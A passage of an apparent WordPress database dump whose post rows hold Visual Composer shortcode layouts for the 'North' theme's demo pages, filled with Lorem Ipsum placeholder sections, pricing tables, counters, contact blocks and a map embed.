20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%5D\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css_animation=\"left-to-right\"]\n<h1>PARALLAX WITH DEGRADE</h1>\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock not simply.\n\n[list icon=\"caret-right\" color=\"dark\" background=\"yes\"]\n\n[li]There are many variations of passages.<span style=\"color: #ffffff;\">.</span>[/li]\n\n[li]Contrary to popular belief, Lorem Ipsum is not simply random text.[/li]\n\n[li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.[/li]\n\n[li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.<span style=\"color: #ffffff;\">.</span>[/li]\n\n[li]But I must explain to you how all this mistaken idea<span style=\"color: #ffffff;\">.</span>[/li]\n\n[/list]\n\nSed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium dolorem que laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo.\n\n[button label=\"Read More\" url=\"#\" color=\"black\"][/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"601\" css_animation=\"right-to-left\" border_color=\"grey\" img_link_target=\"_self\" img_size=\"full\" alignment=\"right\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"facts\"][vc_column width=\"1/1\"][special_heading title=\"WHAT OUR FUN FACTORS\" color=\"dark\" animated=\"yes\" margin_bottom=\"0\"][vc_row_inner][vc_column_inner width=\"1/4\"][counter title=\"Days Worked\" number=\"640\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Projects Finished\" number=\"1250\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Coffee Cups\" number=\"2040\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Pizza Ordered\" number=\"1620\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1406483567360{border-top-width: 1px !important;border-bottom-width: 1px !important;padding-bottom: 50px !important;background-color: #fdfdfd !important;border-color: #eeeeee !important;border-style: solid !important;}\" el_id=\"works\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Portfolio\" color=\"dark\" animated=\"no\" margin_bottom=\"0\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old.\"][portfolio_grid filter=\"yes\" style=\"default\" cols=\"4\" thumb_size=\"square\" paged_posts=\"no\" cats=\"branding,design,photography,video\" thumb_style=\"alt\" more_url=\"http://veented.com/themes/north/portfolio/\" fullwidth=\"no\" thumb_space=\"yes\" posts_nr=\"9\"][/vc_column][/vc_row][vc_row el_id=\"team\"][vc_column width=\"1/1\"][special_heading title=\"Our Creative Team\" color=\"dark\" animated=\"no\" margin_bottom=\"0\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\"][team_carousel posts_nr=\"6\"][/vc_column][/vc_row][vc_row el_id=\"features\" css=\".vc_custom_1405099363182{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i21.jpg?id=537) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][special_heading title=\"Features With Mobile\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical. There are many variations of passages of Lorem Ipsum available.\" margin_bottom=\"60\"][vc_row_inner css=\".vc_custom_1409241287891{margin-bottom: -30px !important;}\"][vc_column_inner width=\"1/3\" css=\".vc_custom_1409241343251{padding-top: 80px !important;padding-right: 0px !important;padding-left: 0px !important;}\"][icon_box title=\"Analystic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"right\" icon=\"fa-camera-retro\" animated=\"yes\" animation_delay=\"200\"][icon_box title=\"Web Design\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"right\" icon=\"fa-cog\" animated=\"yes\" animation_delay=\"400\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1409240908382{padding-right: 0px !important;padding-left: 0px !important;}\"][vc_single_image image=\"606\" alignment=\"center\" border_color=\"grey\" img_link_target=\"_self\" img_size=\"full\" css=\".vc_custom_1405099308623{margin-bottom: -250px !important;}\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1409241349337{padding-top: 80px !important;padding-right: 0px !important;padding-left: 0px !important;}\"][icon_box title=\"Wordpress\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"left\" icon=\"fa-desktop\" animated=\"yes\" animation_delay=\"200\"][icon_box title=\"Graphic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"left\" icon=\"fa-paper-plane-o\" animated=\"yes\" animation_delay=\"400\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1406710109493{padding-top: 100px !important;padding-bottom: 100px !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1408506433699{padding-top: 0px !important;background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/testimonials-1.jpg?id=924) !important;}\" bg_overlay=\"dark\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][testimonials style=\"simple\" posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1404037588724{padding-bottom: 70px !important;}\"][vc_column width=\"1/1\"][special_heading title=\"What Clients Says\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\"][testimonials style=\"expanded\" posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1404039027476{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #3a3a3a !important;}\"][vc_column width=\"1/1\"][logos_carousel images=\"568,566,567,563,564,565\" onclick=\"custom_link\" custom_links=\"#,#,#,#,#\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1403955268505{margin-bottom: -15px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/1\"][special_heading title=\"WHY DO YOU CHOOSE NORTH?\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1409774028101{padding-bottom: 80px !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" el_id=\"what-we\"][vc_column width=\"1/2\"][vc_tabs][vc_tab title=\"Design\" tab_id=\"1403954748-1-96f2de-a3846118-b2da\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\"><img class=\"size-full wp-image-926 alignleft\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\" alt=\"mini-phone\" width=\"164\" height=\"116\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Company\" tab_id=\"1403954748-2-63f2de-a3846118-b2da\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\"><img class=\"alignright size-full wp-image-927\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\" alt=\"mini-phone1\" width=\"130\" height=\"165\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Support\" tab_id=\"1405423831831-2-66118-b2da\"][vc_column_text]Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][/vc_tabs][/vc_column][vc_column width=\"1/2\"][vc_accordion][vc_accordion_tab title=\"Awesome Design\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Improved Documentation\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Clean Coded\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][/vc_accordion][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099662664{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i31.jpg?id=538) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" fullwidth=\"yes\" parallax=\"yes\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Featured Works\" color=\"dark\" animated=\"yes\" subtitle=\"CONTRARY TO POPULAR BELIEF, LOREM IPSUM IS NOT SIMPLY RANDOM TEXT. IT HAS ROOTS IN PIECE OF CLASSICAL. THERE ARE MANY VARIATIONS OF PASSAGES OF LOREM IPSUM AVAILABLE.\"][portfolio_carousel cats=\"branding,design,photography,video\" posts_nr=\"6\" thumb_style=\"alt\"][cta heading=\"super responsive, clean and creative theme\" subtitle=\"This is Photoshop\'s version of Lorem Ipsum. Proin gravida nibh vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum.\" button1_title=\"Our Portfolio\" button1_url=\"#works\" button2_title=\"Keep in Touch\" button2_url=\"#contact\" margin_bottom=\"0\" button1_subtitle=\"click for our all works\" button2_subtitle=\"send us a message\" style=\"centered\" button_color=\"white\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1403956257324{background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\"][vc_column width=\"1/1\"][special_heading title=\"Our Skills\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"55|Design,85|Wordpress,75|HTML&amp;CSS\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"70|Photography,75|Web Design,80|Photoshop\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099917341{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i41.jpg?id=539) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\" bg_overlay=\"light\" el_id=\"services\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"OUR SERVICES\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia.\"][services_carousel posts_nr=\"5\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099958560{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\" darken=\"light\" bg_overlay=\"darker\" color_scheme=\"white\" el_id=\"prices\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Pricing Tables\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Starter\" price=\"$19\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"100\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Standard\" price=\"$39\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"300\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Professional\" price=\"$59\" period=\"per year\" featured=\"yes\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"500\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Platinum\" price=\"$79\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"700\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1404125302141{padding-bottom: 70px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\" bg_overlay=\"light\"][vc_column width=\"1/1\"][special_heading title=\"Keep in Touch\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\"][vntd_contact_form email=\"prafgon@gmail.com\" label_name=\"Please enter your Name\" label_email=\"Please enter your E-Mail\" label_subject=\"Please enter your Subject\" label_message=\"Please enter your Message\" label_submit=\"Send E-Mail\" id=\"417\" animated=\"no\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405424323297{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\" bg_overlay=\"darker\" el_id=\"contact\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][contact_block phone=\"0123 456 789\" address=\"NORTH, STREET NAME 6209, MELBOURNE AUSTRALIA\" email=\"SUPPORT@GOLDEYESTHEME.COM\" facebook=\"#\" twitter=\"#\" linkedin=\"#\" youtube=\"#\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405425125857{padding-top: 0px !important;padding-bottom: 0px !important;}\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][gmap lat=\"41.862274\" long=\"-87.701328\" height=\"400\" zoom=\"15\" marker1_title=\"Office 1\" marker1_text=\"Your description goes here.\" marker1_location=\"custom\" marker1_location_custom=\"41.863774,-87.721328\" marker2_title=\"Our other store\" marker2_text=\"My secondary marker description.\" marker2_location=\"41.858774,-87.685328\"][/vc_column][/vc_row]','Home12','','inherit','closed','closed','','761-revision-v1','','','2014-07-15 20:14:54','2014-07-15 20:14:54','',761,'http://highperformingstudent.com/2014/07/15/761-revision-v1/',0,'revision','',0),(784,1,'2014-07-15 21:19:55','2014-07-15 21:19:55','[vc_row content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" css=\".vc_custom_1405492388637{margin-bottom: 80px !important;padding-top: 25px !important;}\"][vc_column width=\"1/1\"][portfolio_grid filter=\"yes\" thumb_space=\"no\" cols=\"5\" thumb_size=\"square\" cats=\"branding,design,photography,video\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/1\"][special_heading title=\"KEEP IN TOUCH\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" animated=\"yes\" margin_bottom=\"30\"][vntd_contact_form id=\"417\" animated=\"no\"][/vc_column][/vc_row]','Our Portfolio','','publish','open','open','','portfolio','','','2014-07-15 21:19:55','2014-07-15 21:19:55','',0,'http://veented.com/themes/north/?page_id=784',0,'page','',0),(818,1,'2014-07-15 23:41:31','2014-07-15 23:41:31','[vc_row el_id=\"first\" content_width=\"fullwidth\" css=\".vc_custom_1405464975290{background-color: #a5a5a5 !important;}\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column][vntd_fullscreen_slider style=\"style1\" posts_nr=\"6\" button1_label=\"Get Started\" bg_overlay=\"none\" animated=\"no\" images=\"553,562\" button1_url=\"#blog\" text_dynamic=\"Welcome to our Blog\" buttons_color=\"light\"][/vc_column][/vc_row]','Blog with Right Sidebar','','publish','open','open','','blog-with-right-sidebar','','','2014-07-15 23:41:31','2014-07-15 23:41:31','',0,'http://veented.com/themes/north/?page_id=818',0,'page','',0),(820,1,'2014-07-15 23:43:44','2014-07-15 23:43:44','[vc_row el_id=\"first\" content_width=\"fullwidth\" css=\".vc_custom_1405464975290{background-color: #a5a5a5 !important;}\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column][vntd_fullscreen_slider style=\"style1\" posts_nr=\"6\" button1_label=\"Get Started\" bg_overlay=\"none\" animated=\"no\" images=\"553,562\" button1_url=\"#blog\" text_dynamic=\"Welcome to our Blog\" buttons_color=\"light\"][/vc_column][/vc_row]','Blog with Left Sidebar','','publish','open','open','','blog-with-left-sidebar','','','2014-07-15 23:43:44','2014-07-15 23:43:44','',0,'http://veented.com/themes/north/?page_id=820',0,'page','',0),(978,1,'2014-09-12 17:13:49','2014-09-12 17:13:49','[vc_row css=\".vc_custom_1410736550778{padding-top: 0px !important;padding-bottom: 0px !important;background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/09/rain-bg.jpg?id=1039) !important;}\" el_id=\"first\" fullwidth=\"yes\" row_width=\"fullwidth\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" bg_rain=\"yes\"][vc_column width=\"1/1\"][vntd_fullscreen_slider text_static=\"We are North! We love to design. We are happy with you are!\" style=\"style1\" posts_nr=\"6\" button1_label=\"Purchase\" button1_url=\"#\" custom_links=\"Welcome to North,We are Designers,We Love to Design\" text_dynamic=\"We create awesome themes!,We are creative Designers,We love to Design\" button2_label=\"Read More\" button2_url=\"#about\" animated=\"no\" bg_overlay=\"dark2\" buttons_color=\"dark\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405422234264{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #1f1f1f !important;}\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][cta button_title=\"Click me!\" button_url=\"http://\" button_color=\"dark\" button_color_custom=\"#5cbbf5\" text_align=\"left\" fullwidth=\"no\" subtitle=\"It is a long established fact that a reader will be distracted by the readable content of at its layout.\" button1_title=\"Purchase\" button1_url=\"#\" button2_title=\"Get Started\" button2_url=\"#about\" heading=\"Welcome to North!\" style=\"default\"]WELCOME TO NORTH![/cta][/vc_column][/vc_row][vc_row el_id=\"about\"][vc_column width=\"1/1\"][special_heading subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" text_align=\"center\" title=\"About North\" color=\"dark\" animated=\"yes\" margin_bottom=\"65\"]About North[/special_heading][vc_row_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Professional Design\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-desktop\" animated=\"yes\" animation_delay=\"300\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Retina Ready\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-comments-o\" animated=\"yes\" animation_delay=\"500\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"7x24 Support\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-life-ring\" animated=\"yes\" animation_delay=\"700\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Clean Coding\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-flask\" animated=\"yes\" animation_delay=\"900\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"what-we-do\" css=\".vc_custom_1405099060231{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i11.jpg?id=536) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" text_align=\"center\" title=\"What we do\" color=\"white\" animated=\"yes\" margin_bottom=\"0\"]About North[/special_heading][north_tabs tabs=\"%5B%7B%22title%22%3A%22Movie%22%2C%22heading%22%3A%22Movie%22%2C%22text%22%3A%22Contrary%20to%20popular%20belief%2C%20Lorem%20Ipsum%20is%20not%20simply%20random%20text.%20It%20has%20roots%20in%20a%20piece%20of%20classical%20Latin%20literature%20from%2045%20BC%2C%20making%20it%20over%202000%20years%20old.%20Rich%20McClintock%20not%20simply.%20There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form.%22%7D%2C%7B%22title%22%3A%22Landing%22%2C%22heading%22%3A%22Landing%22%2C%22text%22%3A%22There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form%2C%20by%20injected%20humour%2C%20or%20randomised%20words%20which%20don%E2%80%99t%20look%20even%20snormally%20believable.%20If%20you%20are%20going%20to%20use%20a%20passage%20of%20Lorem%20Ipsum%2C%20you%20need%20to%20be%20sure%20there%20isn%E2%80%99t%20anything%20embarrassing%20hidden%20in%20the%20middle%20of%20text.%20All%20the%20Lorem%20Ipsum%20generators%20on%20the%20Internet%20tend%20to%20repeat%20predefined%20chunks%20as%20necessary%2C%20making%20this%20the%20first%20true%20generator%20on%20the%20Internet.%20It%20uses%20a%20dictionary%20of%20over%20200%20Latin%20words%2C%20combined%20with%20a%20handful%20of%20model%20sentence%20structures%2C%20to%20generate%20Lorem%20Ipsum%20which%20looks%20reasonable.%20The%20generated%20Lorem%20Ipsum%20is%20therefore%20always%20free%20from%20repetition%2C%20injected%20humour%2C%20or%20non-characteristic%20words%20etc.%22%7D%2C%7B%22title%22%3A%22Design%22%2C%22heading%22%3A%22Design%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%2C%7B%22title%22%3A%22Art%22%2C%22heading%22%3A%22Art%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%5D\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css_animation=\"left-to-right\"]\n<h1>PARALLAX WITH DEGRADE</h1>\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock not simply. [list icon=\"caret-right\" color=\"dark\" background=\"yes\"] [li]There are many variations of passages.<span style=\"color: #ffffff;\">.</span>[/li] [li]Contrary to popular belief, Lorem Ipsum is not simply random text.[/li] [li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.[/li] [li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.<span style=\"color: #ffffff;\">.</span>[/li] [li]But I must explain to you how all this mistaken idea<span style=\"color: #ffffff;\">.</span>[/li] [/list] Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium dolorem que laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo.\n\n[button label=\"Read More\" url=\"#facts\" color=\"black\" scroll=\"yes\"][/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"601\" css_animation=\"right-to-left\" border_color=\"grey\" img_link_target=\"_self\" img_size=\"full\" alignment=\"right\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"facts\"][vc_column width=\"1/1\"][special_heading title=\"WHAT OUR FUN FACTORS\" color=\"dark\" animated=\"yes\" margin_bottom=\"0\"][vc_row_inner][vc_column_inner width=\"1/4\"][counter title=\"Days Worked\" number=\"640\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Projects Finished\" number=\"1250\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Coffee Cups\" number=\"2040\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Pizza Ordered\" number=\"1620\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1405492003813{border-top-width: 1px !important;padding-bottom: 10px !important;border-color: #eeeeee !important;border-style: solid !important;}\" el_id=\"works\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Portfolio\" color=\"dark\" animated=\"no\" margin_bottom=\"0\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old.\"][portfolio_grid filter=\"yes\" style=\"default\" cols=\"5\" thumb_size=\"square\" paged_posts=\"no\" cats=\"branding,design,photography,video\" thumb_style=\"alt\" fullwidth=\"no\" thumb_space=\"no\"][/vc_column][/vc_row][vc_row el_id=\"team\"][vc_column width=\"1/1\"][special_heading title=\"Our Creative Team\" color=\"dark\" animated=\"no\" margin_bottom=\"0\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\"][team_carousel posts_nr=\"6\"][/vc_column][/vc_row][vc_row el_id=\"features\" css=\".vc_custom_1405099363182{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i21.jpg?id=537) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][special_heading title=\"Features With Mobile\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical. There are many variations of passages of Lorem Ipsum available.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709770765{padding-top: 60px !important;}\"][icon_box title=\"Analystic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"right\" icon=\"fa-camera-retro\" animated=\"yes\" 